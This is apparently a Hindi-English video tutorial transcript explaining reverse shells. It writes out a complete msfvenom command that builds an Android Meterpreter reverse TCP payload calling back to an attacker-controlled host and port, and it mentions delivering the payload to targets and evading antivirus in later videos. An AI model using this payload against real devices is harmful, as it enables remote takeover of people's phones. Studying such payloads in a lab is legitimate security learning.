आज हम लोग इस वीडियो में पेलोड बनाना सीखेंगे यूजिंग MSF Venom। सो बिना किसी देरी के इस वीडियो को स्टार्ट करते हैं। सो पेलोड क्रिएशन के लिए आपको इन तीन चीज़ों की रिक्वायरमेंट है, जो कि MSF Venom या फिर मेटास्प्लॉइट फ्रेमवर्क है, एंड Kali Linux आपकी बेसिकली Kali Linux वर्चुअल मशीन, और आपको एक एंड्रॉयड वर्चुअल मशीन भी चाहिए होगी जिस पे आप इस पेलोड को टेस्ट कर सकें। तो पेलोड क्रिएशन से पहले हम ये समझ लेते हैं कि रिवर्स शेल होता क्या है। रिवर्स शेल एक टेक्निक होती है जिसमें जो अटैकर है वो डायरेक्टली टारगेट सिस्टम को एक्सेस नहीं करता, बल्कि टारगेट सिस्टम खुद अटैकर के सिस्टम से कनेक्ट होता है यूजिंग एन ओपन पोर्ट, जो कि हैकर अपने सिस्टम पर ओपन कर लेता है। इट कैन बी एनी पोर्ट, ओके, सो इट डजंट मैटर। इसका यूज तब होता है जब फायरवॉल या नेटवर्क सिक्योरिटी रूल्स इनकमिंग कनेक्शंस को ब्लॉक करते हो। तो टारगेट सिंपली एक बहुत स्मार्ट टेक्निक का यूज करता है, और टारगेट सिस्टम को अटैकर एक बहुत स्मार्ट टेक्निक का यूज करता है और टारगेट सिस्टम को बोलता है कि तुम ही मुझे कनेक्ट कर लो। सो दैट्स अ वेरी स्मार्ट मूव। इसमें बेसिकली 4 स्टेप्स होते हैं। सो फर्स्ट स्टेप इज बेसिकली द टारगेट इनिशिएट्स द कनेक्शन। पहला स्टेप होता है कि जिस सिस्टम को हैक करना है, जो कि टारगेट सिस्टम है, वो खुद अटैकर के सिस्टम से कनेक्ट करे एक स्पेसिफिक पोर्ट और प्रोटोकॉल के थ्रू। यहाँ पे हम TCP प्रोटोकॉल का यूज करेंगे। इसका मतलब टारगेट सिस्टम ही अटैकर को कनेक्शन भेजता है। दूसरा स्टेप है अटैकर लिसन्स फॉर द कनेक्शन। अब अटैकर पहले से ही रेडी होता है, उसने अपने सिस्टम पर एक लिसनर सेट किया होता है जो वेट करता है कनेक्शन आने का। ये लिसनर एक टूल या स्क्रिप्ट होती है जो रिवर्स शेल हैंडल कर सकता है। थर्ड स्टेप इज अटैकर गेन्स रिमोट एक्सेस। जैसे ही कनेक्शन एस्टेब्लिश होता है तो अटैकर को एक कमांड लाइन इंटरफेस मिल जाता है, एंड इसका मतलब ये होता है कि हमने सिस्टम में ब्रेक थ्रू कर लिया है एंड वी हैव गेन्ड एक्सेस टू द टारगेट सिस्टम, जो कि एक बहुत मेजर स्टेप है इन द एक्सप्लॉयटेशन ऑफ द सिस्टम। एंड द फोर्थ स्टेप इज attacker performs its action, and that's when we say that the system is exploited. So let's get into this payload creation part. इसके लिए हम अपना टर्मिनल ओपन कर लेते हैं, and let me zoom in. and इसके पेलोड क्रिएशन के लिए हमको रूट टर्मिनल में एंटर करना होगा। So let's do sudo su and let me enter the password. MSF Venom के लिए रूट टर्मिनल इससे रिक्वायर्ड है क्योंकि बेसिकली इट रिक्वायर्स रूट प्रिविलेजेस। सो नॉर्मल टर्मिनल में ये कमांड काम नहीं करेगी, इसलिए आपको रूट टर्मिनल में एंटर करना ज़रूरी है। सो द कमांड इज़ वेरी सिंपल। आपको सिर्फ सीधा टाइप करना है MSF Venom। सो मैं ये कमांड को स्क्रीन पे भी डाल दूंगा। सो लेट मी टाइप MSF Venom -p android / meterpreter then another / reverse TCP, and then we need to specify lhost. Lhost is basically listener's host, so that which is the IP of your machine. तो मैं यहाँ पे अपनी मशीन का IP देख लेता हूँ ifconfig करके, and this is 192.168.1.10. तो मैं यहाँ पे ये lhost स्पेसिफाई कर दूंगा, which is equals to 192.168.1.10, और फिर आपको स्पेसिफाई करना है L पोर्ट, जो कि कोई भी पोर्ट हो सकता है अगर उस पर कोई सर्विस रन नहीं कर रही। तो मैं यहाँ पे 4444 पोर्ट स्पेसिफाई कर देता हूँ, एंड देन उसके बाद आपको -o स्पेसिफाई कर देना है, जो कि है आपका आउटपुट फाइल, यानी कि payload.apk। मैंने इसका नाम पेलोड रखा है, आप कुछ भी रख सकते हैं, दैट्स अप टू यू। सो कुछ सेकेंड्स में हमको पेलोड क्रिएट करके दे देगा। लेट्स वेट फॉर इट। एंड नाउ आप देख सकते हैं कि इसने हमको पेलोड क्रिएट करके दे दिया है, जो कि payload.ap के नाम से सेव्ड है। इस वीडियो के लिए हम अभी इतना ही रखते हैं, एंड नेक्स्ट वीडियो में हम देखेंगे कि आप इस पेलोड को कैसे टारगेट मशीन तक पहुंचा सकते हैं यूजिंग सेवरल मेथड्स। एंड इस वीडियो के लिए अभी इतना ही। एंड ये तो बेसिक पेलोड था, हम एडवांस पेलोड जनरेशन भी देखेंगे जो कि मशीन्स डिटेक्ट ना कर पाएँ। सो दैट इज़ ऑल्सो रिक्वायर्ड so that we are not recognizable by the antiviruses.